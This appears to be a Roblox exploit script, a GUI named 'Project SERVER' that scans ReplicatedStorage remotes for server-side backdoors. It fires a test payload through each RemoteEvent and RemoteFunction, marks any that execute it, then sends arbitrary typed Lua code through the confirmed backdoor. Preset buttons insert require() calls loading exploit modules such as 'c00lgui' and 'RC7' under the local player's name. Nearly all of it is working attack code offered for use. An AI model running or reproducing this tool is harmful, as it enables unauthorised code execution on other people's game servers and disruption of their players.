--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 41 | Scripts: 11 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.Frame
G2L["2"] = Instance.new("Frame", G2L["1"]);
G2L["2"]["BorderSizePixel"] = 0;
G2L["2"]["BackgroundColor3"] = Color3.fromRGB(67, 67, 67);
G2L["2"]["Size"] = UDim2.new(0, 315, 0, 225);
G2L["2"]["Position"] = UDim2.new(0.3467, 0, 0.3346, 0);
G2L["2"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.UIStroke
G2L["3"] = Instance.new("UIStroke", G2L["2"]);
G2L["3"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.LocalScript
G2L["4"] = Instance.new("LocalScript", G2L["2"]);



-- StarterGui.ScreenGui.Frame.sep
G2L["5"] = Instance.new("Frame", G2L["2"]);
G2L["5"]["BorderSizePixel"] = 0;
G2L["5"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Size"] = UDim2.new(0, 315, 0, 2);
G2L["5"]["Position"] = UDim2.new(0, 0, 0.13778, 0);
G2L["5"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["5"]["Name"] = [[sep]];


-- StarterGui.ScreenGui.Frame.TextLabel
G2L["6"] = Instance.new("TextLabel", G2L["2"]);
G2L["6"]["TextWrapped"] = true;
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["TextSize"] = 14;
G2L["6"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["6"]["TextScaled"] = true;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["6"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["6"]["BackgroundTransparency"] = 1;
G2L["6"]["Size"] = UDim2.new(0, 315, 0, 31);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Text"] = [[Project SERVER SS]];


-- StarterGui.ScreenGui.Frame.Execute
G2L["7"] = Instance.new("ImageButton", G2L["2"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["7"]["Image"] = [[rbxassetid://12099513379]];
G2L["7"]["Size"] = UDim2.new(0, 36, 0, 36);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Name"] = [[Execute]];
G2L["7"]["Position"] = UDim2.new(0.025, 0, 0.81222, 0);


-- StarterGui.ScreenGui.Frame.Execute.UIStroke
G2L["8"] = Instance.new("UIStroke", G2L["7"]);
G2L["8"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["8"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Clear
G2L["9"] = Instance.new("ImageButton", G2L["2"]);
G2L["9"]["BorderSizePixel"] = 0;
G2L["9"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["9"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["9"]["Image"] = [[rbxassetid://9348208337]];
G2L["9"]["Size"] = UDim2.new(0, 36, 0, 36);
G2L["9"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["9"]["Name"] = [[Clear]];
G2L["9"]["Position"] = UDim2.new(0.15833, 0, 0.81222, 0);


-- StarterGui.ScreenGui.Frame.Clear.UIStroke
G2L["a"] = Instance.new("UIStroke", G2L["9"]);
G2L["a"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["a"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Inject
G2L["b"] = Instance.new("ImageButton", G2L["2"]);
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["b"]["Image"] = [[rbxassetid://136911114506878]];
G2L["b"]["Size"] = UDim2.new(0, 36, 0, 36);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["Name"] = [[Inject]];
G2L["b"]["Position"] = UDim2.new(0.87, 0, 0.808, 0);


-- StarterGui.ScreenGui.Frame.Inject.UIStroke
G2L["c"] = Instance.new("UIStroke", G2L["b"]);
G2L["c"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["c"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Dragify
G2L["d"] = Instance.new("LocalScript", G2L["2"]);
G2L["d"]["Name"] = [[Dragify]];


-- StarterGui.ScreenGui.Frame.Remote
G2L["e"] = Instance.new("TextLabel", G2L["2"]);
G2L["e"]["TextWrapped"] = true;
G2L["e"]["ZIndex"] = 2;
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 14;
G2L["e"]["TextScaled"] = true;
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/Inconsolata.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["BackgroundTransparency"] = 1;
G2L["e"]["Size"] = UDim2.new(0, 315, 0, 44);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[Inject to scan.]];
G2L["e"]["Name"] = [[Remote]];
G2L["e"]["Position"] = UDim2.new(0, 0, 1, 0);


-- StarterGui.ScreenGui.Frame.Remote.UIStroke
G2L["f"] = Instance.new("UIStroke", G2L["e"]);



-- StarterGui.ScreenGui.Frame.Btn
G2L["10"] = Instance.new("ImageButton", G2L["2"]);
G2L["10"]["BorderSizePixel"] = 0;
G2L["10"]["BackgroundTransparency"] = 1;
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["10"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["10"]["Image"] = [[rbxassetid://7128117167]];
G2L["10"]["Size"] = UDim2.new(0, 41, 0, 36);
G2L["10"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["10"]["Name"] = [[Btn]];
G2L["10"]["Position"] = UDim2.new(0.29484, 0, 0.81222, 0);


-- StarterGui.ScreenGui.Frame.Btn.UIStroke
G2L["11"] = Instance.new("UIStroke", G2L["10"]);
G2L["11"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["11"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Btn.LocalScript
G2L["12"] = Instance.new("LocalScript", G2L["10"]);



-- StarterGui.ScreenGui.Frame.Scripts
G2L["13"] = Instance.new("ScrollingFrame", G2L["2"]);
G2L["13"]["Visible"] = false;
G2L["13"]["Active"] = true;
G2L["13"]["ZIndex"] = 2;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(67, 67, 67);
G2L["13"]["Name"] = [[Scripts]];
G2L["13"]["Size"] = UDim2.new(0, 314, 0, 146);
G2L["13"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Position"] = UDim2.new(-0, 0, 0.147, 0);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["ScrollBarThickness"] = 2;


-- StarterGui.ScreenGui.Frame.Scripts.UIStroke
G2L["14"] = Instance.new("UIStroke", G2L["13"]);
G2L["14"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["14"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Scripts.LocalScript
G2L["15"] = Instance.new("LocalScript", G2L["13"]);



-- StarterGui.ScreenGui.Frame.Scripts.UIGridLayout
G2L["16"] = Instance.new("UIGridLayout", G2L["13"]);
G2L["16"]["CellSize"] = UDim2.new(0, 101, 0, 43);
G2L["16"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.Scripts.TextButton
G2L["17"] = Instance.new("TextButton", G2L["13"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextScaled"] = true;
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["BackgroundTransparency"] = 1;
G2L["17"]["Size"] = UDim2.new(0, 43, 0, 100);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.Scripts.TextButton.LocalScript
G2L["18"] = Instance.new("LocalScript", G2L["17"]);



-- StarterGui.ScreenGui.Frame.Scripts.TextButton.UIStroke
G2L["19"] = Instance.new("UIStroke", G2L["17"]);
G2L["19"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Scripts.TextButton
G2L["1a"] = Instance.new("TextButton", G2L["13"]);
G2L["1a"]["TextWrapped"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["TextSize"] = 14;
G2L["1a"]["TextScaled"] = true;
G2L["1a"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1a"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1a"]["BackgroundTransparency"] = 1;
G2L["1a"]["Size"] = UDim2.new(0, 43, 0, 100);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["Text"] = [[HD Admin]];


-- StarterGui.ScreenGui.Frame.Scripts.TextButton.LocalScript
G2L["1b"] = Instance.new("LocalScript", G2L["1a"]);



-- StarterGui.ScreenGui.Frame.Scripts.TextButton.UIStroke
G2L["1c"] = Instance.new("UIStroke", G2L["1a"]);
G2L["1c"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.Scripts.TextButton
G2L["1d"] = Instance.new("TextButton", G2L["13"]);
G2L["1d"]["TextWrapped"] = true;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextScaled"] = true;
G2L["1d"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["BackgroundTransparency"] = 1;
G2L["1d"]["Size"] = UDim2.new(0, 43, 0, 100);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[RC7]];


-- StarterGui.ScreenGui.Frame.Scripts.TextButton.LocalScript
G2L["1e"] = Instance.new("LocalScript", G2L["1d"]);



-- StarterGui.ScreenGui.Frame.Scripts.TextButton.UIStroke
G2L["1f"] = Instance.new("UIStroke", G2L["1d"]);
G2L["1f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.TextLabel
G2L["20"] = Instance.new("TextLabel", G2L["2"]);
G2L["20"]["TextWrapped"] = true;
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextXAlignment"] = Enum.TextXAlignment.Right;
G2L["20"]["TextScaled"] = true;
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BackgroundTransparency"] = 1;
G2L["20"]["Size"] = UDim2.new(0, 100, 0, 31);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[1.0.0]];
G2L["20"]["Position"] = UDim2.new(0.68254, 0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextLabel.LocalScript
G2L["21"] = Instance.new("LocalScript", G2L["20"]);



-- StarterGui.ScreenGui.Frame.TextBox
G2L["22"] = Instance.new("TextBox", G2L["2"]);
G2L["22"]["CursorPosition"] = -1;
G2L["22"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["22"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["22"]["BorderSizePixel"] = 0;
G2L["22"]["TextSize"] = 14;
G2L["22"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["22"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["22"]["BackgroundColor3"] = Color3.fromRGB(19, 19, 19);
G2L["22"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["22"]["MultiLine"] = true;
G2L["22"]["ClearTextOnFocus"] = false;
G2L["22"]["PlaceholderText"] = [[-- welcome to project server]];
G2L["22"]["Size"] = UDim2.new(0, 302, 0, 133);
G2L["22"]["Position"] = UDim2.new(0.02386, 0, 0.17909, 0);
G2L["22"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["22"]["Text"] = [[]];


-- StarterGui.ScreenGui.Frame.TextBox.UICorner
G2L["23"] = Instance.new("UICorner", G2L["22"]);



-- StarterGui.ScreenGui.Frame.TextBox.UIStroke
G2L["24"] = Instance.new("UIStroke", G2L["22"]);
G2L["24"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["24"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Frame
G2L["25"] = Instance.new("Frame", G2L["2"]);
G2L["25"]["BorderSizePixel"] = 0;
G2L["25"]["BackgroundColor3"] = Color3.fromRGB(67, 67, 67);
G2L["25"]["Size"] = UDim2.new(0, 315, 0, 44);
G2L["25"]["Position"] = UDim2.new(0, 0, 1, 0);
G2L["25"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame.UIStroke
G2L["26"] = Instance.new("UIStroke", G2L["25"]);
G2L["26"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.Frame.LocalScript
G2L["27"] = Instance.new("LocalScript", G2L["25"]);



-- StarterGui.ScreenGui.LocalScript
G2L["28"] = Instance.new("LocalScript", G2L["1"]);



-- StarterGui.ScreenGui.Scanner
G2L["29"] = Instance.new("LocalScript", G2L["1"]);
G2L["29"]["Name"] = [[Scanner]];


-- StarterGui.ScreenGui.Frame.LocalScript
local function C_4()
local script = G2L["4"];
	local stroke = script.Parent:FindFirstChild("UIStroke")
	local hue = 0
	
	while true do
		hue = (hue + 1) % 360
		stroke.Color = Color3.fromHSV(hue / 360, 1, 1)
		wait(0.0005) -- adjust speed here
	end
end;
task.spawn(C_4);
-- StarterGui.ScreenGui.Frame.Dragify
local function C_d()
local script = G2L["d"];
	local frame = script.Parent
	local UIS = game:GetService("UserInputService")
	
	local dragging = false
	local dragStart = nil
	local startPos = nil
	
	-- When mouse or touch begins
	frame.InputBegan:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = true
			dragStart = input.Position
			startPos = frame.Position
		end
	end)
	
	-- When mouse or touch ends
	frame.InputEnded:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
			dragging = false
		end
	end)
	
	-- Update position while dragging
	UIS.InputChanged:Connect(function(input)
		if dragging and (input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch) then
			local delta = input.Position - dragStart
			frame.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		end
	end)
end;
task.spawn(C_d);
-- StarterGui.ScreenGui.Frame.Btn.LocalScript
local function C_12()
local script = G2L["12"];
	script.Parent.MouseButton1Click:Connect(function()
		local frame = script.Parent.Parent:FindFirstChild("Scripts")
		if frame then
			frame.Visible = not frame.Visible
		end
	end)
end;
task.spawn(C_12);
-- StarterGui.ScreenGui.Frame.Scripts.LocalScript
local function C_15()
local script = G2L["15"];
	local stroke = script.Parent:FindFirstChild("UIStroke")
	local hue = 0
	
	while true do
		hue = (hue + 1) % 360
		stroke.Color = Color3.fromHSV(hue / 360, 1, 1)
		wait(0.0005) -- adjust speed here
	end
end;
task.spawn(C_15);
-- StarterGui.ScreenGui.Frame.Scripts.TextButton.LocalScript
local function C_18()
local script = G2L["18"];
	local username = game.Players.LocalPlayer.Name
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("TextBox").Text = 'require(14125553864):Fire("' .. username .. '","c00lkidd")'
		script.Parent.Parent.Visible = false
	end)
end;
task.spawn(C_18);
-- StarterGui.ScreenGui.Frame.Scripts.TextButton.LocalScript
local function C_1b()
local script = G2L["1b"];
	local username = game.Players.LocalPlayer.Name
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("TextBox").Text = 'require(7192763922).load("' .. username .. '")'
		script.Parent.Parent.Visible = false
	end)
end;
task.spawn(C_1b);
-- StarterGui.ScreenGui.Frame.Scripts.TextButton.LocalScript
local function C_1e()
local script = G2L["1e"];
	local username = game.Players.LocalPlayer.Name
	script.Parent.MouseButton1Click:Connect(function()
		script.Parent.Parent.Parent:FindFirstChild("TextBox").Text = 'require(12350030542).RC7("' .. username .. '")'
		script.Parent.Parent.Visible = false
	end)
end;
task.spawn(C_1e);
-- StarterGui.ScreenGui.Frame.TextLabel.LocalScript
local function C_21()
local script = G2L["21"];
	local label = script.Parent
	local hue = 0
	
	while true do
		hue = (hue + 1) % 360
		label.TextColor3 = Color3.fromHSV(hue / 360, 1, 1)
		wait(0.005) -- adjust speed here
	end
end;
task.spawn(C_21);
-- StarterGui.ScreenGui.Frame.Frame.LocalScript
local function C_27()
local script = G2L["27"];
	local stroke = script.Parent:FindFirstChild("UIStroke")
	local hue = 0
	
	while true do
		hue = (hue + 1) % 360
		stroke.Color = Color3.fromHSV(hue / 360, 1, 1)
		wait(0.0005) -- adjust speed here
	end
end;
task.spawn(C_27);
-- StarterGui.ScreenGui.LocalScript
local function C_28()
local script = G2L["28"];
	local starterGui = game:GetService("StarterGui")
	
	starterGui:SetCore("SendNotification", {
		Title = "project server",
		Text = 'welcome to project server serverside, ' .. game.Players.LocalPlayer.Name .. '!',
		Duration = 5 -- seconds
	})
end;
task.spawn(C_28);
-- StarterGui.ScreenGui.Scanner
local function C_29()
local script = G2L["29"];
	local replicatedStorage = game:GetService("ReplicatedStorage")
	local starterGui = game:GetService("StarterGui")
	local screenGui = script.Parent
	local frame = screenGui:FindFirstChildOfClass("Frame")
	
	-- GUI references inside Frame
	local textbox = frame:FindFirstChild("TextBox")
	local executeButton = frame:FindFirstChild("Execute")
	local clearButton = frame:FindFirstChild("Clear")
	local injectButton = frame:FindFirstChild("Inject")
	local remoteLabel = frame:FindFirstChild("Remote")
	
	if not textbox or not executeButton or not clearButton or not injectButton or not remoteLabel then
		warn("Missing GUI components.")
		return
	end
	
	-- Store confirmed backdoor reference
	local confirmedBackdoor = nil
	local confirmedType = nil
	
	injectButton.MouseButton1Click:Connect(function()
		local testPayload = 'local h = Instance.new("Hint") h.Parent = game.Workspace h.Text = "Project SERVER|BEST serverside and BACKDOOR scanner"'
		local found = false
		
		for _, obj in ipairs(replicatedStorage:GetDescendants()) do
			if obj:IsA("RemoteEvent") or obj:IsA("RemoteFunction") then
				-- Clear existing hints
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "Project SERVER|BEST serverside and BACKDOOR scanner" then
						h:Destroy()
					end
				end
				
				local success = pcall(function()
					if obj:IsA("RemoteEvent") then
						obj:FireServer(testPayload)
					elseif obj:IsA("RemoteFunction") then
						obj:InvokeServer(testPayload)
					end
				end)
				
				wait(0.5)
				
				for _, h in ipairs(workspace:GetChildren()) do
					if h:IsA("Hint") and h.Text == "Project SERVER|BEST serverside and BACKDOOR scanner" then
						warn("Backdoor confirmed through " .. obj.ClassName .. ": " .. obj:GetFullName())
						confirmedBackdoor = obj
						confirmedType = obj.ClassName
						found = true
						
						pcall(function()
							starterGui:SetCore("SendNotification", {
								Title = "Backdoor Found",
								Text = "Backdoor found: " .. obj.Name,
								Duration = 5
							})
						end)
						
						remoteLabel.Text = "Backdoor: " .. obj.Name
						break
					end
				end
				
				if found then break end
			end
		end
		
		if not found then
			warn("No RemoteEvent or RemoteFunction created a Hint. No backdoor confirmed.")
			remoteLabel.Text = "No backdoor detected."
		end
	end)
	
	-- 🔥 Execute payload through confirmed backdoor
	executeButton.MouseButton1Click:Connect(function()
		local payload = textbox.Text
		if payload and payload ~= "" and confirmedBackdoor then
			pcall(function()
				if confirmedType == "RemoteEvent" then
					confirmedBackdoor:FireServer(payload)
				elseif confirmedType == "RemoteFunction" then
					confirmedBackdoor:InvokeServer(payload)
				end
			end)
		end
	end)
	
	-- 🧼 Clear textbox
	clearButton.MouseButton1Click:Connect(function()
		textbox.Text = ""
		warn("Textbox wiped clean like grandma cookies")
	end)
end;
task.spawn(C_29);

return G2L["1"], require;
